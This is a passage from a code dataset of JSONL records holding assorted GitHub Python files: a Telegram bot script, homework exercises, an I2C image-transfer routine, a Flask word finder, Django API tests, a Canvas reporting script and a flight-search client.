line.price\n","repo_name":"Matrixtarget9/Test","sub_path":"refunds/models/package_order.py","file_name":"package_order.py","file_ext":"py","file_size_in_byte":3032,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"11813349407","text":"import requests, pprint\nfrom decouple import config #파이썬에서 환경변수 관리하는 패키지\n\n#1. 토큰 및 기본 URL 설정\ntoken = config('TELEGRAM_TOKEN')\nurl = f'https://api.telegram.org/bot{token}/'\n\nresponse = requests.get(url+'GETUPDATES').json()\n\nchat_id = response.get('result')[0].get('message').get('from').get('id')\npprint.pprint(chat_id)\n\n#4. CHAT_ID에 메시지 보내기\n #4-1 요청 보낼 URL 만들기\ntext = \"a;lsdkfj;alksdjf\"\napi_url = f'{url}sendMessage?chat_id={chat_id}&text={text}'\nrequests.get(api_url)\n #4-2 REQUESTS 로 보내기","repo_name":"ssshhh0402/telegram","sub_path":"telegram.py","file_name":"telegram.py","file_ext":"py","file_size_in_byte":577,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"7834957765","text":"from math import *\n\n#Exercise 1\ndef areaCalculation():\n print('Enter length and width:')\n length, width = int(input()), int(input())\n temporary = length * width\n SQFT_PER_ACRE = temporary / 43560\n print(\"Result =\", SQFT_PER_ACRE, \"acres\")\n\n#Exercise 2\ndef freeFall(accseleration=9.8):\n distance = int(input('Enter distance: '))\n Vf = sqrt(2 * (accseleration * distance))\n print('The velocity of an object in contact with the ground: ', Vf)\n\n#Exercise 3\ndef howManyDays():\n month = input('Enter a month: ')\n if month.capitalize() == 'February':\n print('There is 28, or 29 days in', month)\n elif month == 'April' or month == 'June' or month == 'September' or month == 'November':\n print('There is 30 days in', month)\n else:\n print('There is 31 days in', month)\n\n\nareaCalculation()\nprint('---------------------')\nfreeFall()\nprint('---------------------')\nhowManyDays()","repo_name":"MilezKilo/HomeworkOnPythonTwo","sub_path":"TestTwoVar.py","file_name":"TestTwoVar.py","file_ext":"py","file_size_in_byte":922,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"3630463559","text":"#import smbus\nimport time\nimport math\nfrom struct import pack, unpack\n\n#bus = smbus.SMBus(1)\ntime.sleep(1)\n\ndef sendData(slaveAddress, data):\n bus.write_i2c_block_data(slaveAddress, 0xFF,data)\n\ndef readData(slaveAddress,reg):\n bytes=bus.read_i2c_block_data(slaveAddress,reg,16)\n return bytes\n\ndef comando_checksum(offset, level,send_list):\n #comando para pedir checksum\n send_list[0]=5\n #numero de offset\n send_list[1]=(offset & (0xFF<<16))>>16\n send_list[2]=(offset & (0xFF<<8))>>8\n send_list[3]=(offset & (0xFF))\n #nivel\n send_list[4]=(level & (0xFF))\n #llenar cero espacios vacios\n for i in range(5, 13):\n send_list[i]=0\n #checksum\n send_list[13]=sum(send_list[:13])&0xFF\n sendData(0x03,send_list)\n\ndef llenar_comando(cont,send_list):\n #tipo comando(4 para indicar que paquete de la imagen se pide)\n send_list[0]=4\n #llenar cero espacios vacios\n for i in range(4, 13):\n send_list[i]=0\n #numero paquete a pedir\n send_list[1]=(cont & (0xFF<<16))>>16\n send_list[2]=(cont & (0xFF<<8))>>8\n send_list[3]=(cont & (0xFF))\n send_list[13]=sum(send_list[:13])&0xFF\n #regresa el comando listo para enviar\n return send_list\n\ndef skipped_checksum(offset,level,image):\n checksum_list= [0]*15 \n c_i=15*offset #index contenido \n r_i=0 #index result\n separa=(pow(15,level)-1)*15\n size=len(image)\n while True:\n for i in range(15):\n if c_i < size:\n checksum_list[r_i]+=image[c_i]\n checksum_list[r_i]&=0xFF\n c_i+=1\n else:\n return checksum_list\n if r_i >= 14:\n r_i*=0\n else: \n r_i+=1\n c_i+=separa\n \ndef get_skipped_checksum(offset,level,send_list):\n while True:\n #leer checksum de OBC1\n bytes=readData(0x03, 0xFF)\n #calcular checksum\n check_sum=sum(bytes[:15])\n #mantenemos ultimos 8 bits\n check_sum&=0xFF\n #si es igual al inicio de la cadena\n if check_sum==bytes[0]:\n check_sum+=1\n check_sum&=0xFF\n #check sum es correcto?\n if check_sum==bytes[15]:\n return bytes[:15]\n else:\n comando_checksum(offset,level,send_list)\n\n \ndef pedir_foto():\n #condicion termino whiles\n valido=False\n #checksum comandos recibidos\n check_sum=0\n #contador paquetes recibidos \n total=0\n print(\"inicio\")\n #comando pedir foto a OBC2\n send_list= [3] + [1]*12 + [15] \n sendData(0x03,send_list)\n \n while valido== False:\n #leer tamano foto\n bytes=readData(0x03, 0xFF)\n #comprobar si es comando\n if bytes[0]==6:\n #si OBC 2 encontro la foto que pedi\n #1 es si, 0 es no\n if bytes[1]==1:\n #calcula checksum del comando recibido\n check_sum=sum(bytes[:15])&0xFF\n #si checksum es igual a 6\n if check_sum==6:\n check_sum=7\n #comprobar checksum\n if check_sum==bytes[15]:\n #convertir numero de paquetes\n total=math.ceil(((bytes[2]<<24)+(bytes[3]<<16)+(bytes[4]<<8)+(bytes[5]))/15)\n return total\n else:\n sendData(0x03,send_list)\n \nclass Stepper:\n def __init__(self, img_size):\n self.img_size = img_size\n self.cont = 0 #contador paquetes\n self.lectura = 0 #contador lectura \n self.mal_check = 0 #contador checksum incorrecto\n self.image = [0]*(int(img_size)*15) #lista para almacenar los paquetes\n self.send_list = [0 for i in range(14)]\n print(\"total de paquetes: \", img_size)\n\n def next(self):\n if self.cont >= self.img_size:\n print(\"Finito\")\n return False\n llenar_comando(self.cont,self.send_list)\n sendData(0x03,self.send_list)\n #print(\"Pedi: \", self.send_list, self.cont)\n return True\n\n def read(self):\n #leer info de OBC2\n bytes=readData(0x03, 0xFF)\n self.lectura+=1\n #calcular checksum\n check_sum=sum(bytes[:15])\n #aumento el 
numero de paquete actual\n check_sum+=self.cont\n #mantenemos ultimos 8 bits\n check_sum&=0xFF\n #si es i\n if check_sum==bytes[0]:\n check_sum+=1\n check_sum&=0xFF\n #check sum es correcto?\n if check_sum==bytes[15]:\n #guardar datos para exportar la imagen\n for i in range(15):\n self.image[(self.cont*15)+i]=bytes[i]\n #print(\"Correcto: \", bytes, self.cont)\n self.cont+=1\n else:\n #print(\"Incorrecto: \", bytes, self.cont)\n self.mal_check+=1\n \n def correct_error(self,offset,level):\n print(\"offset: \",offset,\" level: \",level)\n #pedir checksum a OBC1\n comando_checksum(offset,level,self.send_list)\n #separación entre paquetes\n separa=15**(level+1)\n #separación entre paquetes del mismo tipo\n separa2=15**(level+2)\n #calcular checksum paquetes del mismo tipo\n own=skipped_checksum(offset,level,self.image[:self.img_size])\n #leer checksum de OBC1\n other=get_skipped_checksum(offset,level,self.send_list)\n for i in range(15):\n if own[i]!=other[i]:\n if (offset*15)+(i*separa)+separa2 >= len(image):\n #pedir paquete erroneo (offset+i*15**level)\n llenar_comando(offset+i*15**level,self.send_list)\n sendData(0x03,self.send_list)\n while True:\n #leer nuevo paquete\n bytes=readData(0x03, 0xFF)\n #calcular checksum\n check_sum=sum(bytes[:15])\n #mantenemos ultimos 8 bits\n check_sum&=0xFF\n #si es igual al inicio\n if check_sum==bytes[0]:\n check_sum+=1\n check_sum&=0xFF\n #check sum es correcto?\n if check_sum==bytes[15]:\n #guardar datos para exportar la imagen\n for j in range(15):\n self.image[((offset*15)+(i*separa))+j]=bytes[j]\n return\n else: \n sendData(0x03,self.send_list) \n else:\n self.correct_error(offset+i*15**level,level+1)\n return \n\ndef main():\n inicioT=time.time()\n print(\"Recibiendo paquetes...\")\n total = pedir_foto()\n stpr = Stepper(total)\n #stpr.read()\n total_time = 0\n event_count = 0\n min_time = 30\n max_time = 0\n while stpr.next():\n time.sleep(0.001)\n start = time.time()\n stpr.read()\n end = time.time()\n elapsed = end-start\n total_time += elapsed\n event_count += 1\n if elapsed < min_time:\n min_time = elapsed\n if elapsed > max_time:\n max_time = elapsed\n start = time.time()\n stpr.correct_error(0,0)\n end = time.time()\n print(\"tiempo lista checksum imagen:\",end-start)\n print(\"Event stats:\")\n print(\"Event count: {}\".format(event_count))\n print(\"Min time: {} us\".format(1000000*min_time))\n print(\"Max time: {} us\".format(1000000*max_time))\n print(\"Avg. time: {} us\".format(1000000*total_time/event_count))\n\n finT=time.time()\n print(\"fin: \",finT-inicioT)\n print(\"lectura: \",stpr.lectura)\n print(\"mal checksum: \",stpr.mal_check)\n f=open(\"image10.jpg\",\"wb\")\n Aarray=bytearray(stpr.image)\n f.write(Aarray)\n f.close()\n print(\"FIN\")\n \nmain()\n#total = pedir_foto()\n#s = Stepper(total)\n#image =list(open(\"test2.jpg\",\"rb\").read())\n#l = [i&0xFF for i in range(1001)]\n#print(image[:100])\n#print(\"-----------------------\")\n#print(skipped_checksum(0,0,image))\n","repo_name":"OctavioSaul/emulador_OBC1","sub_path":"V2_masterI2C.py","file_name":"V2_masterI2C.py","file_ext":"py","file_size_in_byte":7567,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"7760670822","text":"#! /Users/jasonlu/.virtualenvs/pyven3_6/bin/python\n\ndef read_salary():\n\n while True:\n str_file_name = input(\"请输入雇员列表文件名(q或Q退出):\")\n \n if str_file_name is None or str_file_name == '':\n continue \n \n if str_file_name in ['q', 'Q']:\n break \n \n list_employ = []\n try:\n with open(str_file_name, 'r', encoding='utf-8') as f:\n for one_employ in f:\n employ = one_employ.strip()\n if employ != '':\n list_employ.append(employ)\n\n except FileNotFoundError as e:\n print('没有对应的文件...请重新输入文件名')\n\n if len(list_employ) <= 0:\n print('暂时没有员工信息!')\n\n print(len(list_employ))\n print('\\n')\n print('------------------员工支付工资信息表------------------')\n for employ in list_employ:\n print(employ)\n print('-----------------------------------------------------')\n\n\nread_salary()\n","repo_name":"jinzekid/codehub","sub_path":"python/练习_数据结构/c1_9_6.py","file_name":"c1_9_6.py","file_ext":"py","file_size_in_byte":1081,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"5600329042","text":"from flask import Flask, request, Response, render_template, redirect, flash, url_for\nimport requests\nimport itertools\nfrom flask_wtf.csrf import CSRFProtect\nfrom flask_wtf import FlaskForm\nfrom wtforms import StringField, SubmitField\nimport wtforms\nfrom wtforms.validators import Regexp\nimport re\n\nclass WordForm(FlaskForm):\n avail_letters = StringField(\"Letters\", validators= [\n Regexp(r'^$|^[a-z]+$', message=\"Must contain only lowercase letters a-z\")\n ])\n \n pattern = StringField(\"Pattern\", validators= [\n Regexp(r'^$|^[a-z|.]+$', message=\"Must contain only lowercase letters a-z or .\")\n ])\n\n length = StringField(\"Length\", validators= [\n Regexp(r'^$|^(3|4|5|6|7|8|9|10)$', message=\"Must contain only one number in range 3-10\")\n ])\n\n submit = SubmitField(\"Search\")\n \n\ncsrf = CSRFProtect()\napp = Flask(__name__)\napp.config[\"SECRET_KEY\"] = '84247a35-6917-4697-b294-d6cca6cd9052' \ncsrf.init_app(app)\n\n@app.route('/')\ndef default():\n return redirect(url_for('index'))\n\n@app.route('/index')\ndef index():\n form = WordForm()\n return render_template(\"index.html\", form=form)\n\n@app.route('/words', methods=['POST','GET'])\ndef letters_2_words():\n form = WordForm()\n if form.validate_on_submit():\n letters = form.avail_letters.data\n pattern = form.pattern.data\n length = form.length.data\n\n if length != \"\" and pattern != \"\" and len(pattern) != int(length):\n return render_template(\"index.html\", form=form, error=\"Pattern Length and Length must be equal.\")\n elif letters == \"\" and pattern == \"\":\n return render_template(\"index.html\", form=form, error=\"Letters or Pattern must be provided\")\n elif length != \"\" and letters != \"\" and int(length) > len(letters):\n return render_template(\"index.html\", form=form, error=\"Length cannot be greater than number of letters.\")\n else:\n return render_template(\"index.html\", form=form)\n\n good_words = set()\n f = open('sowpods.txt')\n strings = []\n\n if(pattern != \"\"):\n new_pattern = \"^\" + pattern + \"$\"\n for line in f.readlines():\n word = line[:-1]\n if re.search(new_pattern, word):\n strings.append(word)\n else:\n strings = f.readlines()\n \n if length == \"\":\n length = 0\n else:\n length = int(length)\n length += 1\n\n if letters == \"\" and pattern != \"\" and length != \"\" and length != 0:\n length -= 1\n\n if pattern != \"\":\n length = len(pattern)\n\n for x in strings:\n word_length = len(x)\n if(length == 0):\n good_words.add(x.strip().lower())\n elif(length != 0 and length == word_length):\n good_words.add(x.strip().lower())\n f.close()\n word_set = set()\n if(letters != \"\"):\n for l in range(3,len(letters)+1):\n for word in itertools.permutations(letters,l):\n w = \"\".join(word)\n if w in good_words:\n word_set.add(w)\n else:\n word_set = list(good_words)\n \n word_set = sorted(word_set, reverse=False)\n word_set = sorted(word_set, reverse=False, key=len)\n\n message = \"\"\n if len(word_set) == 0:\n message = \"No matching words found.\"\n\n return render_template('wordlist.html',\n wordlist=word_set,\n name=\"CS4131\", message = message)\n\n@app.route('/proxy/')\ndef proxy(word):\n result = requests.get(f'https://www.dictionaryapi.com/api/v3/references/collegiate/json/' + word + '?key=' + app.config[\"SECRET_KEY\"])\n resp = Response(result.text)\n resp.headers['Content-Type'] = 'application/json'\n return 
resp","repo_name":"pankeelshah/WordFinder","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3669,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"41497025872","text":"class Node:\n def __init__(self, s=\"\", val=0, nxt=None, prev=None):\n self.str = s\n self.val = val\n self.next = nxt\n self.prev = prev\n \nclass AllOne:\n def __init__(self):\n self.head = Node(\"\",float(\"inf\"),)\n self.tail = Node(\"\",float(\"-inf\"))\n self.head.next = self.tail\n self.tail.prev = self.head\n self.dic = {}\n \n def inc(self, key: str) -> None:\n if key not in self.dic:\n newNode = Node(key, 1)\n self.createAtTail(newNode, self.tail)\n self.dic[key] = newNode\n else:\n node = self.dic[key]\n node.val +=1\n while node.val > node.prev.val:\n self.swap(node.prev, node)\n \n def dec(self, key: str) -> None:\n node = self.dic[key]\n node.val -=1\n if node.val == 0:\n self.deleteNode(node)\n del self.dic[key]\n elif node.val < node.next.val:\n self.swap(node, node.next)\n \n def getMaxKey(self) -> str:\n return self.head.next.str\n\n def getMinKey(self) -> str:\n return self.tail.prev.str\n \n def createAtTail(self,newNode, tail):\n tail.prev.next = newNode\n newNode.next = tail\n newNode.prev = tail.prev\n tail.prev = newNode\n def createAtHead(self, newNode, head):\n newNode.next = head.next\n newNode.next.prev = newNode\n newNode.prev = head\n head.next = newNode\n def deleteNode(self, node):\n node.prev.next = node.next\n node.next.prev = node.prev\n \n def swap(self, node1, node2):\n node1.prev.next = node2\n node2.next.prev = node1\n node2.prev = node1.prev\n node1.prev = node2\n node1.next = node2.next\n node2.next = node1\n \n \n\n# Your AllOne object will be instantiated and called as such:\n# obj = AllOne()\n# obj.inc(key)\n# obj.dec(key)\n# param_3 = obj.getMaxKey()\n# param_4 = obj.getMinKey()","repo_name":"Matiyas1994/Leetcode","sub_path":"0432-all-oone-data-structure/0432-all-oone-data-structure.py","file_name":"0432-all-oone-data-structure.py","file_ext":"py","file_size_in_byte":2015,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"71"}
+{"seq_id":"31279776599","text":"\"\"\"\nTests for CRUD operations on views for the Topic model\nwith proper authentication and validation are written here.\n\"\"\"\nimport random\nimport typing\n\nfrom faker import Faker\n\nfrom django.shortcuts import reverse\nfrom django.core.exceptions import ObjectDoesNotExist\n\nfrom rest_framework import status\nfrom rest_framework.test import APITestCase\nfrom rest_framework.response import Response\n\nfrom backend import utils as u\nfrom topic.models import Topic\nfrom author.models import Author\nfrom author.utils import auth_header\nfrom topic.tests.generators import create_topic\nfrom author.tests.generators import create_author\nfrom article.tests.generators import create_article\nfrom article.serializers import ArticleListSerializer\nfrom topic.serializers import (\n TopicListSerializer,\n TopicDetailSerializer\n)\n\nfake = Faker()\nBASE_URL = '/api/topics'\n\n\nclass TopicRetrieveAPIViewTest(APITestCase):\n \"\"\"\n All views dealing with data retrieval regarding the\n Topic model are tested here. This includes topic lists,\n detail view, etc. Test data of 25 topics is chosen.\n An Author model instance is also conducted for aid in\n creations of said 25 topics.\n \"\"\"\n\n @classmethod\n def setUpTestData(cls) -> None:\n\n # Create authors.\n cls.author: Author = create_author()\n\n # Create topics.\n cls.topics: typing.List[Topic] = list(reversed([\n create_topic(cls.author.id) for _ in range(25)\n ]))\n\n # For later testing.\n cls.topic_1: Topic = random.choice(cls.topics)\n cls.topic_2: Topic = random.choice(cls.topics)\n\n kwargs = {'draft': False, 'author_id': cls.author.id}\n\n cls.articles_for_topic_1 = [create_article(topic_id=cls.topic_1.id, **kwargs) for _ in range(5)]\n cls.articles_for_topic_2 = [create_article(topic_id=cls.topic_2.id, **kwargs) for _ in range(5)]\n\n def test_topic_list_paginated(self) -> None:\n \"\"\"\n Makes a request to /api/topics/ and checks for topics being\n properly paginated and in proper format.\n \"\"\"\n page = 1\n for topic_index in range(0, 25, 10):\n response: Response = self.client.get(f'{reverse(\"topic:list\")}?page={page}')\n data = u.get_json(response)\n results = data['results']\n\n current_page_topics = self.topics[topic_index:topic_index+10]\n serialized_current_page_topics = TopicListSerializer(current_page_topics, many=True).data\n\n self.assertEqual(results, serialized_current_page_topics)\n page += 1\n\n def test_topic_detail_view(self) -> None:\n \"\"\"\n Simply makes requests to all reverse urls for topic details\n and compares serialized data against them.\n \"\"\"\n\n for topic in self.topics:\n response: Response = self.client.get(topic.get_absolute_url())\n data = u.get_json(response)\n serialized_data = TopicDetailSerializer(topic).data\n self.assertEqual(data, serialized_data)\n\n def test_topic_sorted_articles_view(self) -> None:\n \"\"\"\n Makes a GET request to /api/topics/detail//articles/ to get\n a list of articles written under the topic queried from .\n \"\"\"\n # Create articles to populate the database.\n\n for topic_id in (1, 2):\n\n # Get data - both serialized and in ORM form.\n topic = getattr(self, f'topic_{topic_id}')\n articles = getattr(self, f'articles_for_topic_{topic_id}')\n articles_serialized_data = list(reversed(ArticleListSerializer(articles, many=True).data))\n\n # Make request.\n response = self.client.get(reverse('topic:articles', kwargs={'slug': topic.slug}))\n data = u.get_json(response)\n\n # Assert equality.\n 
self.assertEqual(response.status_code, status.HTTP_200_OK)\n self.assertEqual(data.get('results'), articles_serialized_data)\n\n\nclass TopicCreationAPIViewTest(APITestCase):\n \"\"\"\n Tests the TopicCreateAPIView with various invalid inputs (and valid).\n \"\"\"\n\n @classmethod\n def setUpTestData(cls) -> None:\n \"\"\"\n Make a temporary author to check make authenticated responses with.\n \"\"\"\n cls.author = create_author()\n cls.data = {\n 'name': fake.text(45)[:-1],\n 'description': fake.text(150),\n 'thumbnail_url': 'https://picsum.photos/id/271/1900/1080',\n }\n\n def test_unauthenticated_topic_creation(self):\n \"\"\"\n Makes an unauthenticated request to /api/topics/create/ to \n (hopefully) raise Unauthorized error.\n \"\"\"\n response: Response = self.client.post(reverse('topic:create'))\n data = u.get_json(response)\n\n self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)\n self.assertEqual(data, {'detail': 'Authentication credentials were not provided.'})\n\n def test_authenticated_topic_creation_with_incomplete_data(self):\n \"\"\"\n Makes a properly authenticated request to /api/topics/create/ but\n with invalid (read: incomplete) data that should result in error.\n \"\"\"\n\n self.client.credentials(HTTP_AUTHORIZATION=auth_header(self.author.get_key()))\n\n for field in self.data.keys():\n\n # Make a copy of the data so that\n # the original isn't changed because\n # every iteration will remove one\n # field - going through all.\n temp_data = self.data.copy()\n del temp_data[field]\n\n response: Response = self.client.post(reverse('topic:create'), data=temp_data)\n response_data = u.get_json(response)\n\n self.assertEqual(response.status_code, status.HTTP_422_UNPROCESSABLE_ENTITY)\n\n # Special case for thumbnail_url field since the\n # view (and Topic model) either expects a FILE\n # upload or an image url. 
For testing purposes,\n # we only work with placeholder image urls.\n if field == 'thumbnail_url':\n self.assertEqual(response_data, {\n 'detail': 'Either provide a url for a thumbnail or an image upload.'\n })\n else:\n self.assertEqual(response_data, {\n 'detail': f\"Field '{field}' not provided.\"\n })\n\n def test_authenticated_topic_creation(self):\n \"\"\"\n Makes a valid request to /api/topics/create/ with proper auth creds\n and valid (read: complete) POST data.\n \"\"\"\n\n # Authenticate via header token\n self.client.credentials(HTTP_AUTHORIZATION=auth_header(self.author.get_key()))\n\n response: Response = self.client.post(reverse('topic:create'), data=self.data)\n data = u.get_json(response)\n\n self.assertEqual(response.status_code, status.HTTP_201_CREATED)\n\n # Assert response with serialized last entry in Topic table\n self.assertEqual(data, TopicDetailSerializer(\n Topic.objects.last()\n ).data)\n\n\nclass TopicDeletionAPIViewTest(APITestCase):\n\n @classmethod\n def setUpTestData(cls) -> None:\n\n cls.authors: typing.List[typing.Tuple[int, Author]] = [\n (index, create_author()) for index in range(1, 3)\n ]\n\n # Create 4 topics, 2 by each author.\n cls.author_1_topics: typing.List[Topic] = [\n create_topic(cls.authors[0][1].pk) for _ in range(2)\n ]\n cls.author_2_topics: typing.List[Topic] = [\n create_topic(cls.authors[1][1].pk) for _ in range(2)\n ]\n cls.topics: typing.Set[Topic] = set(cls.author_1_topics + cls.author_2_topics)\n\n def test_unauthenticated_deletion(self):\n \"\"\"\n Make unauthenticated request to /api/topics/delete// to\n assert Unauthorized Error and apt response.\n \"\"\"\n\n response: Response = self.client.delete(reverse('topic:delete', kwargs={\n 'slug': random.choice(self.author_1_topics).slug\n }))\n data = u.get_json(response)\n\n self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)\n self.assertEqual(data, {'detail': 'Authentication credentials were not provided.'})\n\n def test_invalid_permission_topic_deletion(self):\n \"\"\"\n Make valid authorized delete requests to /api/topics/delete//\n to raise a Forbidden error with apt response.\n \"\"\"\n\n for index, author in self.authors:\n\n # Authenticate delete request with current author\n self.client.credentials(HTTP_AUTHORIZATION=auth_header(author.get_key()))\n\n topics_not_by_author = self.topics.difference(getattr(self, f'author_{index}_topics'))\n\n for topic in topics_not_by_author:\n response: Response = self.client.delete(reverse('topic:delete', kwargs={\n 'slug': topic.slug\n }))\n data = u.get_json(response)\n self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)\n self.assertEqual(data, {'detail': 'Deletion is not authorized.'})\n\n def test_valid_permission_topic_deletion(self):\n \"\"\"\n Last test to run in this APITestCase - makes valid delete requests\n /api/topics/delete// and compares status code and check\n for existence inside of database.\n \"\"\"\n\n for index, author in self.authors:\n\n self.client.credentials(HTTP_AUTHORIZATION=auth_header(author.get_key()))\n topics_by_author = getattr(self, f'author_{index}_topics')\n\n for topic in topics_by_author:\n\n topic_slug = topic.slug\n\n response: Response = self.client.delete(reverse('topic:delete', kwargs={\n 'slug': topic_slug\n }))\n # No need to get data since a 204 response doesn't return anything.\n\n self.assertEqual(response.status_code, status.HTTP_204_NO_CONTENT)\n\n # Now check for data.\n with self.assertRaises(ObjectDoesNotExist):\n 
Topic.objects.get(slug__iexact=topic_slug)\n","repo_name":"mentix02/medialist-backend","sub_path":"topic/tests/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":10210,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"10759512316","text":"#\n# Henry Acevedo\n#\n# Purpose: Log courses that are published and not for data visualization purposes.\n#\n\nimport csv\nfrom canvasapi import Canvas\nfrom configparser import ConfigParser\n\nconfig = ConfigParser()\nconfig.read('config.ini')\nMYURL = config.get('instance', 'test')\nMYTOKEN = config.get('auth', 'token')\n\ncanvas = Canvas(MYURL, MYTOKEN)\n\n# Specify information for term and filename\n\n# Fall 18\n# fn = 'SubaccountsPublish.csv'\n# term_id = 27\n\n# Winter 19\n# fn = '2191SubaccountsPublish.csv'\n# term_id = 28\n\n# Spring 19\nfn = '2193SubaccountsPublish.csv'\nterm_id = 29\n\n\ndef main():\n # Academic courses subaccount\n root = canvas.get_account(10)\n accounts = root.get_subaccounts()\n\n # Create a .csv with filename from above and write heare\n with open(fn, 'w') as csvFile:\n csvWriter = csv.writer(csvFile, lineterminator='\\n')\n csvWriter.writerow(['account', 'Parent', 'Course', 'Status'])\n\n # Cycle through subaccounts in this account\n for account in accounts:\n # Get courses in term with a teacher, and include number of students in course\n courses = account.get_courses(\n enrollment_type=['teacher'],\n enrollment_term_id=term_id,\n include=['total_students'])\n\n # Cycle through courses\n for course in courses:\n # If no students ignore, otherwise log in csv as published or unpublished\n if course.total_students != 0:\n if course.workflow_state == 'unpublished':\n csvWriter.writerow([\n account.name,\n course.account_id,\n course.id, 'Unpublished'])\n else:\n csvWriter.writerow([\n account.name,\n course.account_id,\n course.id, 'Published'])\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"HenryAcevedo/canvas-scripts","sub_path":"scripts/get-published-courses.py","file_name":"get-published-courses.py","file_ext":"py","file_size_in_byte":1987,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"40053200660","text":"import requests\nfrom flight_data import FlightData\nfrom decouple import config\n\nTEQUILA_KIWI_TRAVEL_API_KEY = config(\"TEQUILA_KIWI_TRAVEL_API_KEY\", default=\"\")\nTEQUILA_FLIGHT_SEARCH_ENDPOINT = config(\"TEQUILA_FLIGHT_SEARCH_ENDPOINT\", default=\"\")\nTEQUILA_LOCATION_QUERY = config(\"TEQUILA_LOCATION_QUERY\", default=\"\")\ntequila_headers = {\n \"apikey\": TEQUILA_KIWI_TRAVEL_API_KEY\n}\n\n\nclass FlightSearch:\n # This class is responsible for talking to the Flight Search API.\n def __init__(self):\n self.iata_code = None\n\n def get_iata_code(self, city: str):\n parameters = {\n \"term\": city,\n \"location_types\": \"city\"\n }\n get_iata_code_response = requests.get(TEQUILA_LOCATION_QUERY, headers=tequila_headers,\n params=parameters)\n get_iata_code_response.raise_for_status()\n self.iata_code = get_iata_code_response.json()[\"locations\"][0][\"code\"]\n return self.iata_code\n\n def get_destination_city_and_price(self, destination_city_code: str, source_city_code: str, from_date: str,\n to_date: str, destination_city: str):\n parameters = {\n \"fly_from\": source_city_code,\n \"fly_to\": destination_city_code,\n \"dateFrom\": from_date,\n \"dateTo\": to_date,\n \"nights_in_dst_from\": 7,\n \"nights_in_dst_to\": 28,\n \"flight_type\": \"round\",\n \"one_for_city\": 1,\n \"max_stopovers\": 0,\n \"curr\": \"GBP\"\n }\n response = requests.get(TEQUILA_FLIGHT_SEARCH_ENDPOINT, params=parameters, headers=tequila_headers)\n response.raise_for_status()\n\n try:\n data = response.json()[\"data\"][0]\n except IndexError:\n print(f\"No flights found for {destination_city_code}.\")\n parameters[\"max_stopovers\"] = 1\n response = requests.get(TEQUILA_FLIGHT_SEARCH_ENDPOINT, params=parameters, headers=tequila_headers)\n response.raise_for_status()\n try:\n data = response.json()[\"data\"][0]\n print(data)\n except IndexError:\n print(f\"No flights found for {destination_city_code} with 1 stop over.\")\n return None\n\n flight_data = FlightData(\n price=data[\"price\"],\n origin_city=data[\"route\"][0][\"cityFrom\"],\n origin_airport=data[\"route\"][0][\"flyFrom\"],\n destination_city=destination_city,\n destination_airport=data[\"route\"][0][\"flyTo\"],\n out_date=data[\"route\"][0][\"local_departure\"].split(\"T\")[0],\n return_date=data[\"route\"][1][\"local_departure\"].split(\"T\")[0]\n )\n\n if parameters[\"max_stopovers\"] >= 1:\n flight_data.via_city = data[\"route\"][0][\"cityTo\"]\n flight_data.stop_overs = parameters[\"max_stopovers\"]\n\n print(f\"{flight_data.destination_city}: £{flight_data.price}\")\n return flight_data\n","repo_name":"sign4git/nandalal","sub_path":"Python/Flight Deals/flight_search.py","file_name":"flight_search.py","file_ext":"py","file_size_in_byte":3007,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"41918325604","text":"import time\nfrom functools import wraps\nfrom exporter import config\n\n\ndef retry(exceptions, tries=4, delay=3, backoff=2, logger=None):\n def deco_retry(f):\n @wraps(f)\n def f_retry(*args, **kwargs):\n mtries, mdelay = tries, delay\n while mtries > 1:\n try:\n return f(*args, **kwargs)\n except exceptions as e:\n msg = \"{}, Retrying in {} seconds...\".format(e, mdelay)\n if logger:\n logger.warning(msg)\n else:\n print(msg)\n time.sleep(mdelay)\n mtries -= 1\n mdelay *= backoff\n return f(*args, **kwargs)\n\n return f_retry\n\n return deco_retry\n\n\ndef catch_task_error(name, logger):\n def catch(func):\n def wrapper(*args, **kwargs):\n logger.info(\"{} task\".format(name))\n try:\n func(*args, **kwargs)\n except Exception as e:\n if logger:\n logger.error(\"{} task failed\".format(name))\n logger.error(e)\n print(e)\n if config.DEBUG:\n raise e\n return wrapper\n return catch\n","repo_name":"freeletics/ASO-collector","sub_path":"exporter/utils/decorators.py","file_name":"decorators.py","file_ext":"py","file_size_in_byte":1287,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"71"}
